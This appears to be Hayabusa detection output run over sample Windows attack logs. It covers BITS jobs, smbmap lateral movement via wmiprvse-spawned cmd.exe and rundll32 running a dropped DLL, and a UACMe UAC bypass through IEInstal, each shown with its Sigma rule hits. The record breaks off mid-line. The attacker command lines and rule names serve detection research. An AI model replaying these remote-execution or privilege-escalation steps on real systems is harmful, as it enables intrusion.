https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.169 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.230 
+00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.417 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.527 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.571 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.664 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.771 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.807 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.867 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.928 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:52:31.218 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57238 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM 
| Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:52:34.249 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\7okjer.dll | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:52:34.966 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57239 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:01.646 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57240 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:04.161 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57241 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:04.924 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57242 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.436 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2628 | PGUID: 747F3D96-75D1-5F8B-0000-00109EB23300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.436 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.436 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.633 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.676 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 4864 | PGUID: 747F3D96-75D1-5F8B-0000-001061BD3300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.676 
+00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.676 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.720 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.777 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2784 | PGUID: 747F3D96-75D1-5F8B-0000-001088C23300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.777 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.777 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.822 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 
747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:06.755 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:06.755 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-20 11:50:54.810 +00:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.001,technique_name=PowerShell | Cmd: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 | Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x17ed8c | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00 | Hash: SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:54.810 +00:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool 
UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:54.814 +00:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.102 +00:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 8264 | PGUID: 23F38D93-CF1E-5F8E-C908-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.388 +00:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.390 +00:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.392 +00:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.450 +00:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.450 +00:00,DESKTOP-NTSSLJD,11,high,Evas | PrivEsc,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/file_event_win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.450 +00:00,DESKTOP-NTSSLJD,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.461 +00:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\dfcc1807-03a1-4ae1-ab29-5675b285edea\consent.exe.dat | Process: C:\Program Files\Internet Explorer\IEInstal.exe | User: DESKTOP-NTSSLJD\den | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.577 +00:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon 
Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 3760 | PGUID: 23F38D93-CF1F-5F8E-CB08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.004 +00:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.090 +00:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\[1]consent.exe | Process: C:\Windows\explorer.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.090 +00:00,DESKTOP-NTSSLJD,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.218 +00:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 112 | PGUID: 23F38D93-CF20-5F8E-CD08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 
11:50:56.490 +00:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding | LID: 0x17eca2 | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.490 +00:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.490 +00:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.490 +00:00,DESKTOP-NTSSLJD,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.517 +00:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.531 +00:00,DESKTOP-NTSSLJD,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1073,technique_name=DLL Side-Loading | Image: 
C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Company: Integrity Investment LLC | Signed: false | Signature: Unavailable | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.569 +00:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.003,technique_name=Windows Command Shell | Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | LID: 0x17eca2 | PID: 9620 | PGUID: 23F38D93-CF20-5F8E-D008-000000000C00 | Hash: SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.569 +00:00,DESKTOP-NTSSLJD,10,high,,Process Access_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Src Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6896 | Src PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Tgt PID: 9620 | Tgt PGUID: 23F38D93-CF20-5F8E-D008-000000000C00",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.590 
+00:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.731 +00:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 7716 | PGUID: 23F38D93-CF20-5F8E-CF08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.999 +00:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:57.031 +00:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:51:01.476 +00:00,DESKTOP-NTSSLJD,22,info,,DNS Query,Query: wpad | Result: - | Process: C:\Windows\System32\svchost.exe | PID: 2428 | PGUID: 23F38D93-ABAC-5F8E-3900-000000000C00,rules/hayabusa/sysmon/events/22_DNS-Query.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 22:33:02.063 +00:00,MSEDGEWIN10,1,info,,Process 
